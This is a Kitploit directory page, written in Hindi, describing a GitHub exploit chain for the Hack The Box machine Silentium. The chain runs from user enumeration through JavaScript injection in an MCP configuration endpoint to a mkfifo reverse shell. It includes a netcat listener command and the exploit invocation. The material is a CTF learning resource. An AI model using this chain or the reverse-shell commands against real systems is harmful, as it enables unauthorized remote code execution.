Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-58434-59528-htb-ctf — शोषण Silentium HTB-CTF | Kitploit
उपकरण/GitHubGitHub/jwsly12/cve-2025-58434-59528-htb-ctf
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubjwsly12/cve-2025-58434-59528-htb-ctf

CVE-2025-58434-59528-htb-ctf

शोषण Silentium HTB-CTF

रिपॉजिटरी देखें
224 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-58434-59528-htb-ctf

साइलेंशियम एक्सप्लॉइट चेन

यह रिपॉजिटरी Hack The Box की Silentium मशीन के लिए संपूर्ण शोषण श्रृंखला (exploitation chain) प्रदान करती है। यह एक्सप्लॉइट उपयोगकर्ता गणना (user enumeration) और JavaScript इंजेक्शन से जुड़ी दो-चरणीय भेद्यता का लाभ उठाकर रिमोट कोड एक्ज़ीक्यूशन (RCE) प्राप्त करता है।

📝 विवरण

भेद्यता श्रृंखला में एक सूचना प्रकटीकरण दोष (information disclosure flaw) और एक गंभीर कोड इंजेक्शन शामिल है। पहले पासवर्ड रीसेट बग के माध्यम से वैध उपयोगकर्ताओं की गणना करके, हम customMCP एंडपॉइंट को लक्षित करने के लिए आवश्यक संदर्भ प्राप्त करते हैं। RCE को mcpServerConfig पैरामीटर में एक दुर्भावनापूर्ण JavaScript फ़ंक्शन इंजेक्ट करके प्राप्त किया जाता है, जिसे Node.js बैकएंड द्वारा निष्पादित किया जाता है।

🛠️ विशेषताएँ

  • उपयोगकर्ता गणना: एक वर्डलिस्ट का उपयोग करके सिस्टम के वैध ईमेल की खोज को स्वचालित करता है।
  • JavaScript इंजेक्शन: सैनिटाइज़ेशन को बायपास करने के लिए IIFE (तुरंत लागू किया गया फ़ंक्शन एक्सप्रेशन) का लाभ उठाता है।
  • TCP रिवर्स शेल: mkfifo पाइप का उपयोग करके एक स्थिर शेल उत्पन्न करता है।
  • पेलोड ऑटोमेशन: सभी JSON एस्केपिंग और बियरर टोकन प्रमाणीकरण को स्वचालित रूप से संभालता है।

🚀 आवश्यकताएँ

आपके पास Python 3 और Bash स्थापित होना चाहिए, साथ ही निम्नलिखित लाइब्रेरी भी होनी चाहिए:

pip install requests

💻 उपयोग

1. उपयोगकर्ताओं की गणना करें

गणना स्क्रिप्ट (Bash) चलाएँ वैध खाते खोजने के लिए (users.txt आवश्यक है):

python3 CVE-2025-58434.py

2. अपना लिसनर शुरू करें

अपनी स्थानीय मशीन पर, Netcat लिसनर शुरू करें:

nc -lvnp 4444

3. एक्सप्लॉइट चलाएँ

लक्ष्य, अपना IP, और प्राप्त API कुंजी प्रदान करते हुए Python स्क्रिप्ट चलाएँ:

python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444

⚙️ तर्क

ArgumentDescriptionRequired
-t, --targetलक्ष्य होस्टहाँ
-k, --keyAPI बियरर टोकनहाँ
-l, --lhostआपका लिसनर IP (VPN)हाँ
-p, --lportआपका लिसनर पोर्टहाँ

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और CTF वातावरणों में अधिकृत पेनिट्रेशन टेस्टिंग के लिए है। बिना पूर्व अनुमति के लक्ष्यों तक पहुँचना या उन पर हमला करना अवैध है।


चुनौती: Silentium (Hack The Box)
CVEs: CVE-2025-58434 | CVE-2025-59528

टूल डाउनलोड करें